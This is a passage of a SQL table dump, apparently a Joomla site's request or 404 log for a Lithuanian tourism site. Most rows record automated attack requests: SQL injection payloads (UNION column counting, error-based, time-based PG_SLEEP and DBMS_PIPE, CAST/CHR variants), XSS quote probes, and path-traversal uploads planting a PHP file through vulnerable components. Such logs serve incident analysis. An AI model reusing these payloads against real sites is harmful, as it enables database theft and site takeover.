00:00:00'),(3762,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XGHn&Itemid=197','','','',1,0,'2020-04-19 22:36:13','0000-00-00 00:00:00'),(3763,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JSlD&Itemid=197','','','',1,0,'2020-04-19 22:36:14','0000-00-00 00:00:00'),(3764,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SDGt&Itemid=197','','','',1,0,'2020-04-19 22:36:14','0000-00-00 00:00:00'),(3765,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) AND (SELECT 7464 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(7464=7464,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AN','','','',1,0,'2020-04-19 22:36:36','0000-00-00 00:00:00'),(3766,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 AND (SELECT 7464 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(7464=7464,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)','','','',1,0,'2020-04-19 22:36:37','0000-00-00 00:00:00'),(3767,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 AND (SELECT 7464 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(7464=7464,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Z','','','',1,0,'2020-04-19 22:36:38','0000-00-00 00:00:00'),(3768,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) AND 2981=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2981=2981) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||C','','','',1,0,'2020-04-19 22:36:40','0000-00-00 00:00:00'),(3769,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 AND 2981=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2981=2981) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CH','','','',1,0,'2020-04-19 22:36:41','0000-00-00 00:00:00'),(3771,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) AND 7707 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7707=7707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+','','','',1,0,'2020-04-19 22:36:44','0000-00-00 00:00:00'),(3772,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 AND 7707 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7707=7707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+C','','','',1,0,'2020-04-19 22:36:45','0000-00-00 00:00:00'),(3774,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) AND 6377=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6377=6377) THEN 1 ELSE 0 END) FROM DUAL)||CHR(1','','','',1,0,'2020-04-19 22:36:49','0000-00-00 00:00:00'),(3775,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 AND 6377=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6377=6377) THEN 1 ELSE 0 END) FROM DUAL)||CHR(11','','','',1,0,'2020-04-19 22:36:50','0000-00-00 00:00:00'),(3777,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=(SELECT 2044 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(2044=2044,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)','','','',1,0,'2020-04-19 22:36:54','0000-00-00 00:00:00'),(3778,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=(SELECT CONCAT(0x71786a7071,(SELECT (ELT(3480=3480,1))),0x716b716b71))','','','',1,0,'2020-04-19 22:36:54','0000-00-00 00:00:00'),(3779,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=(SELECT (CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8693=8693) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)))','','','',1,0,'2020-04-19 22:36:55','0000-00-00 00:00:00'),(3780,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6405=6405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113','','','',1,0,'2020-04-19 22:36:56','0000-00-00 00:00:00'),(3781,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197);SELECT PG_SLEEP(5)--','','','',1,0,'2020-04-19 22:36:57','0000-00-00 00:00:00'),(3782,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197;SELECT PG_SLEEP(5)--','','','',1,0,'2020-04-19 22:36:58','0000-00-00 00:00:00'),(3783,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(109)||CHR(84)||CHR(68),5) FROM DUAL--','','','',1,0,'2020-04-19 22:37:06','0000-00-00 00:00:00'),(3784,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(109)||CHR(84)||CHR(68),5) FROM DUAL--','','','',1,0,'2020-04-19 22:37:07','0000-00-00 00:00:00'),(3785,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) ORDER BY 1-- CwxN','','','',1,0,'2020-04-19 22:37:10','0000-00-00 00:00:00'),(3786,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) ORDER BY 1481-- pvDQ','','','',1,0,'2020-04-19 22:37:11','0000-00-00 00:00:00'),(3787,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL-- CGIy','','','',1,0,'2020-04-19 22:37:12','0000-00-00 00:00:00'),(3788,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL-- ESVG','','','',1,0,'2020-04-19 22:37:12','0000-00-00 00:00:00'),(3789,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL-- zYyg','','','',1,0,'2020-04-19 22:37:13','0000-00-00 00:00:00'),(3790,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL-- rRqe','','','',1,0,'2020-04-19 22:37:14','0000-00-00 00:00:00'),(3791,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Cwdp','','','',1,0,'2020-04-19 22:37:15','0000-00-00 00:00:00'),(3792,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- nXyL','','','',1,0,'2020-04-19 22:37:16','0000-00-00 00:00:00'),(3793,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VWSl','','','',1,0,'2020-04-19 22:37:17','0000-00-00 00:00:00'),(3794,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZPSS','','','',1,0,'2020-04-19 22:37:18','0000-00-00 00:00:00'),(3795,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- miYB','','','',1,0,'2020-04-19 22:37:18','0000-00-00 00:00:00'),(3796,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- eJco','','','',1,0,'2020-04-19 22:37:19','0000-00-00 00:00:00'),(3797,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 ORDER BY 1-- dBlN','','','',1,0,'2020-04-19 22:37:20','0000-00-00 00:00:00'),(3798,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 ORDER BY 5792-- QWtx','','','',1,0,'2020-04-19 22:37:21','0000-00-00 00:00:00'),(3799,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL-- bEXb','','','',1,0,'2020-04-19 22:37:21','0000-00-00 00:00:00'),(3800,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL-- BTGu','','','',1,0,'2020-04-19 22:37:22','0000-00-00 00:00:00'),(3801,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL-- sQea','','','',1,0,'2020-04-19 22:37:23','0000-00-00 00:00:00'),(3802,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL-- Wzwz','','','',1,0,'2020-04-19 22:37:24','0000-00-00 00:00:00'),(3803,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- YSDQ','','','',1,0,'2020-04-19 22:37:25','0000-00-00 00:00:00'),(3804,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- aIcd','','','',1,0,'2020-04-19 22:37:26','0000-00-00 00:00:00'),(3805,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rBwY','','','',1,0,'2020-04-19 22:37:26','0000-00-00 00:00:00'),(3806,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wyIp','','','',1,0,'2020-04-19 22:37:27','0000-00-00 00:00:00'),(3807,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xJCF','','','',1,0,'2020-04-19 22:37:28','0000-00-00 00:00:00'),(3808,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bnep','','','',1,0,'2020-04-19 22:37:29','0000-00-00 00:00:00'),(3809,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 ORDER BY 1-- ddxK','','','',1,0,'2020-04-19 22:37:30','0000-00-00 00:00:00'),(3810,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 ORDER BY 8863-- ezDh','','','',1,0,'2020-04-19 22:37:30','0000-00-00 00:00:00'),(3811,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL-- ATca','','','',1,0,'2020-04-19 22:37:31','0000-00-00 00:00:00'),(3812,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL-- pWZx','','','',1,0,'2020-04-19 22:37:32','0000-00-00 00:00:00'),(3813,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL-- hlVh','','','',1,0,'2020-04-19 22:37:33','0000-00-00 00:00:00'),(3814,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL-- aVJp','','','',1,0,'2020-04-19 22:37:34','0000-00-00 00:00:00'),(3815,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mBWK','','','',1,0,'2020-04-19 22:37:35','0000-00-00 00:00:00'),(3816,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- fmoS','','','',1,0,'2020-04-19 22:37:36','0000-00-00 00:00:00'),(3817,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fOXg','','','',1,0,'2020-04-19 22:37:36','0000-00-00 00:00:00'),(3818,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- skPz','','','',1,0,'2020-04-19 22:37:37','0000-00-00 00:00:00'),(3819,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gsXQ','','','',1,0,'2020-04-19 22:37:38','0000-00-00 00:00:00'),(3820,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jxHb','','','',1,0,'2020-04-19 22:37:39','0000-00-00 00:00:00'),(3821,'http://infotytuvenai.lt/index.php/lt/forum/main-forum','','','',1,0,'2020-04-26 03:39:08','0000-00-00 00:00:00'),(3822,'http://infotytuvenai.lt/index.php/lt/?option=com_content)(\".(,.,\',&view=article&id=306','','','',1,0,'2020-04-27 23:56:47','0000-00-00 00:00:00'),(3823,'http://infotytuvenai.lt/index.php/lt/?option=com_content\'zxqFMr<\'\">BYkZXZ&view=article&id=306','','','',1,0,'2020-04-27 23:56:48','0000-00-00 00:00:00'),(3824,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_158821767.php','','','',1,0,'2020-04-30 03:40:03','0000-00-00 00:00:00'),(3825,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1588689171.php','','','',1,0,'2020-05-05 14:46:05','0000-00-00 00:00:00'),(3826,'http://www.infotytuvenai.lt/index.php/lt/?start=30/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2020-05-09 14:54:39','0000-00-00 00:00:00'),(3827,'http://www.infotytuvenai.lt/index.php/lt/?start=30/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',1,0,'2020-05-09 14:55:42','0000-00-00 00:00:00'),(3828,'http://www.infotytuvenai.lt/index.php/lt/?start=30/administrator/index.php','','','',32,0,'2020-05-09 14:56:34','0000-00-00 00:00:00'),(3829,'http://infotytuvenai.lt/index.php/lt/?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',1,0,'2020-05-15 06:50:06','0000-00-00 00:00:00'),(3830,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/darbo-uzmokestis','','','',1,0,'2020-05-25 01:56:04','0000-00-00 00:00:00'),(3831,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-strategija','','','',1,0,'2020-05-25 01:56:05','0000-00-00 00:00:00'),(3832,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/parama','','','',1,0,'2020-05-25 01:56:05','0000-00-00 00:00:00'),(3833,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/galerija','','','',1,0,'2020-05-25 01:56:06','0000-00-00 00:00:00'),(3834,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-ataskaitos','','','',1,0,'2020-05-25 01:56:06','0000-00-00 00:00:00'),(3835,'http://infotytuvenai.lt/index.php/lt/index.php/lt/pasiulymai','','','',1,0,'2020-05-25 01:56:07','0000-00-00 00:00:00'),(3836,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija','','','',1,0,'2020-05-25 01:56:07','0000-00-00 00:00:00'),(3837,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2020-05-25 01:56:08','0000-00-00 00:00:00'),(3838,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2020-05-25 01:56:08','0000-00-00 00:00:00'),(3839,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/gido-paslaugos','','','',1,0,'2020-05-25 01:56:09','0000-00-00 00:00:00'),(3840,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/suvenyrai','','','',1,0,'2020-05-25 01:56:09','0000-00-00 00:00:00'),(3841,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2020-05-25 01:56:10','0000-00-00 00:00:00'),(3842,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2020-05-25 01:56:11','0000-00-00 00:00:00'),(3843,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2020-05-25 01:56:12','0000-00-00 00:00:00'),(3844,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/video-apie-kelmes-krasta','','','',1,0,'2020-05-25 01:56:12','0000-00-00 00:00:00'),(3845,'http://infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas','','','',1,0,'2020-05-25 01:56:13','0000-00-00 00:00:00'),(3846,'http://infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas/maitinimo-meniu','','','',1,0,'2020-05-25 01:56:13','0000-00-00 00:00:00'),(3847,'http://infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas/gedulingi-pietus','','','',1,0,'2020-05-25 01:56:14','0000-00-00 00:00:00'),(3848,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apgyvendinimas','','','',1,0,'2020-05-25 01:56:14','0000-00-00 00:00:00'),(3849,'http://infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2020-05-25 01:56:15','0000-00-00 00:00:00'),(3850,'http://infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/muziejai','','','',1,0,'2020-05-25 01:56:15','0000-00-00 00:00:00'),(3851,'http://infotytuvenai.lt/index.php/lt/index.php/lt/projektai','','','',1,0,'2020-05-25 01:56:16','0000-00-00 00:00:00'),(3852,'http://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2020-05-25 01:56:16','0000-00-00 00:00:00'),(3853,'http://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2020-05-25 01:56:17','0000-00-00 00:00:00'),(3854,'http://infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis','','','',1,0,'2020-05-25 01:56:18','0000-00-00 00:00:00'),(3855,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=12','','','',1,0,'2020-05-25 01:56:27','0000-00-00 00:00:00'),(3856,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=24','','','',1,0,'2020-05-25 01:56:28','0000-00-00 00:00:00'),(3857,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=36','','','',1,0,'2020-05-25 01:56:28','0000-00-00 00:00:00'),(3858,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=48','','','',1,0,'2020-05-25 01:56:29','0000-00-00 00:00:00'),(3859,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=60','','','',1,0,'2020-05-25 01:56:29','0000-00-00 00:00:00'),(3860,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=72','','','',1,0,'2020-05-25 01:56:30','0000-00-00 00:00:00'),(3861,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=84','','','',1,0,'2020-05-25 01:56:30','0000-00-00 00:00:00'),(3862,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=96','','','',1,0,'2020-05-25 01:56:30','0000-00-00 00:00:00'),(3863,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=108','','','',1,0,'2020-05-25 01:56:31','0000-00-00 00:00:00'),(3864,'http://infotytuvenai.lt/index.php/lt/index.php/lt?start=144','','','',1,0,'2020-05-25 01:56:31','0000-00-00 00:00:00'),(3865,'http://infotytuvenai.lt/index.php/lt/?option=cOM_cONtENt(\',.\"))))(&view=article&id=306','','http://infotytuvenai.lt:80/index.php/lt/','',1,0,'2020-05-26 05:35:57','0000-00-00 00:00:00'),(3866,'http://infotytuvenai.lt/index.php/lt/?option=com_content\'mVoXGc<\'\">rPYXjT&view=article&id=306','','http://infotytuvenai.lt:80/index.php/lt/','',1,0,'2020-05-26 05:35:57','0000-00-00 00:00:00'),(3867,'http://www.infotytuvenai.lt/index.php/lt/images/meniu/g1.png','','','',1,0,'2020-05-27 04:42:48','0000-00-00 00:00:00'),(3868,'http://www.infotytuvenai.lt/index.php/lt/images/meniu/3.png','','','',1,0,'2020-05-27 08:36:28','0000-00-00 00:00:00'),(3869,'http://www.infotytuvenai.lt/index.php/lt/images/meniu/1.png','','','',1,0,'2020-05-27 09:11:15','0000-00-00 00:00:00'),(3870,'http://www.infotytuvenai.lt/index.php/lt/images/meniu/4.png','','','',1,0,'2020-05-27 23:12:13','0000-00-00 00:00:00'),(3871,'http://infotytuvenai.lt/index.php/lt/?option=com_content(()()).(\"\'&view=article&id=306','','http://infotytuvenai.lt:80/index.php/lt/','',1,0,'2020-06-06 11:37:16','0000-00-00 00:00:00'),(3872,'http://infotytuvenai.lt/index.php/lt/?option=com_content\'QtynSk<\'\">hjPFiy&view=article&id=306','','http://infotytuvenai.lt:80/index.php/lt/','',1,0,'2020-06-06 11:37:16','0000-00-00 00:00:00'),(3873,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 2461 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2461=2461,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (2115=2115&view=article&id=33','','','',1,0,'2020-06-06 11:38:27','0000-00-00 00:00:00'),(3874,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 2461 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2461=2461,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:27','0000-00-00 00:00:00'),(3875,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 2461 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2461=2461,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wmrm&view=article&id=33&Itemid=1','','','',1,0,'2020-06-06 11:38:29','0000-00-00 00:00:00'),(3876,'http://infotytuvenai.lt/index.php/lt/?option=com_content) OR (SELECT 2182 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2182=2182,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (7134=7134&view=article&id=33&','','','',1,0,'2020-06-06 11:38:30','0000-00-00 00:00:00'),(3877,'http://infotytuvenai.lt/index.php/lt/?option=com_content OR (SELECT 2182 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2182=2182,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:30','0000-00-00 00:00:00'),(3878,'http://infotytuvenai.lt/index.php/lt/?option=com_content OR (SELECT 2182 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(2182=2182,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- darM&view=article&id=33&Itemid=19','','','',1,0,'2020-06-06 11:38:32','0000-00-00 00:00:00'),(3879,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 4798=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4798=4798) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC) AND (5195=5','','','',1,0,'2020-06-06 11:38:33','0000-00-00 00:00:00'),(3880,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 4798=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4798=4798) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC)&view=article','','','',1,0,'2020-06-06 11:38:33','0000-00-00 00:00:00'),(3881,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 4798=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4798=4798) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC)-- zdNU&view=','','','',1,0,'2020-06-06 11:38:35','0000-00-00 00:00:00'),(3882,'http://infotytuvenai.lt/index.php/lt/?option=-5288&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:35','0000-00-00 00:00:00'),(3883,'http://infotytuvenai.lt/index.php/lt/?option=-5679) OR 7563=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC) AND (8904=8904&vie','','','',1,0,'2020-06-06 11:38:36','0000-00-00 00:00:00'),(3884,'http://infotytuvenai.lt/index.php/lt/?option=-5952 OR 7563=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC)&view=article&id=33&','','','',1,0,'2020-06-06 11:38:36','0000-00-00 00:00:00'),(3885,'http://infotytuvenai.lt/index.php/lt/?option=-9764 OR 7563=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC)-- gCGy&view=article','','','',1,0,'2020-06-06 11:38:38','0000-00-00 00:00:00'),(3886,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 9575 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9575=9575) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113))) AND (5660=','','','',1,0,'2020-06-06 11:38:39','0000-00-00 00:00:00'),(3887,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 9575 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9575=9575) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)))&view=articl','','','',1,0,'2020-06-06 11:38:39','0000-00-00 00:00:00'),(3888,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 9575 IN (SELECT 